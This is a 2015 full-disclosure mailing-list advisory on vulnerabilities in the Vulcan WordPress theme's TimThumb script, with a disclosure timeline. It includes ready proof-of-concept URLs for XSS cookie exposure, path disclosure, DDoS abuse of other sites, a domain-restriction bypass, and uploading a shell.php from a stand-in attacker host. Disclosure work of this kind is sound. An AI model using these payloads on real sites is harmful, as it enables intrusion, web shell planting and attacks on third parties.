Hello list!

Let's back to vulnerabilities, which I disclosed in April 2011, which can be 
used for DDoS attacks on other sites, e.g. with my DAVOSET 
(http://seclists.org/fulldisclosure/2015/Jun/111). In addition to hundreds 
of themes, which I wrote about in previous years, here is another theme for 
WordPress, which still didn't fix all holes and there are many sites with 
old version of theme (+ WAF bypass).

I want to warn you about multiple vulnerabilities in Vulcan theme for 
WordPress. This is commercial theme for WP.

These are Cross-Site Scripting, Full path disclosure, Abuse of 
Functionality, Denial of Service and Arbitrary File Upload vulnerabilities.

In 2011 I wrote about Cross-Site Scripting, Full path disclosure, Abuse of 
Functionality and Denial of Service vulnerabilities in TimThumb and multiple 
themes for WordPress (http://seclists.org/fulldisclosure/2011/Apr/227), and 
later also was disclosed Arbitrary File Uploading vulnerability.

-------------------------
Affected products:
-------------------------

Vulnerable are all versions of Vulcan theme for WordPress (in last versions 
there were fixed only vulnerabilities in TimThumb, but there are still FPD 
in other php-files).

Since version TimThumb 2.8 all vulnerabilities are fixed (in timthumb.php). 
But AoF and DoS holes are fixed by disabling external hosts by default. If 
to change settings (to allow individual or all external hosts), which is 
allowed by software, then it's possible to conduct attacks on other sites. 
E.g. with using of DAVOSET.

WAF bypass:

At many sites unfixed version of TimThumb in theme is used, but they protect 
themselves using WAF (such as ModSecurity). Note, that WAF doesn't protect 
against FPD holes in this theme and TimThumb, and in some cases it doesn't 
protect against AoF and DoS.

----------
Details:
----------

XSS (WASC-08) (in old versions TimThumb):

http://site/wp-content/themes/vulcan/timthumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/vulcan/timthumb.php?src=1
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/page.png&h=1111111&w=1

Abuse of Functionality (WASC-42):

http://site/wp-content/themes/vulcan/timthumb.php?src=http://site&h=1&w=1
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com&h=1&w=1 
(bypass of restriction on domain, if such restriction is turned on)

DoS (WASC-10):

http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com/big_file&h=1&w=1 
(bypass of restriction on domain, if such restriction is turned on)

About such Abuse of Functionality and Denial of Service vulnerabilities you 
can read in my article Using of the sites for attacks on other sites 
(http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html).

Arbitrary File Upload (WASC-31) (in old versions of TimThumb):

http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com/shell.php

Full path disclosure (WASC-13):

http://site/wp-content/themes/vulcan/

Besides index.php there are also potentially FPD in other php-files of this 
theme.

------------
Timeline:
------------

2011.02.01 - informed developers from WooThemes about holes in their themes.
2011.02.04-12 - conversation about fixing holes in all their themes for WP.
2011.02.07 - announced at my site.
2011.02.08 - informed developer of TimThumb.
2011.02.13 - developer of TimThumb released version 1.25.
2011.02.13 - developers from WooThemes begun updating TimThumb in all their 
themes.
2011.04.13 - disclosed at my site about TimThumb and multiple themes.
2015.07.02 - disclosed at my site about Vulcan theme.

I mentioned about these vulnerabilities at my site 
(http://websecurity.com.ua/7850/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua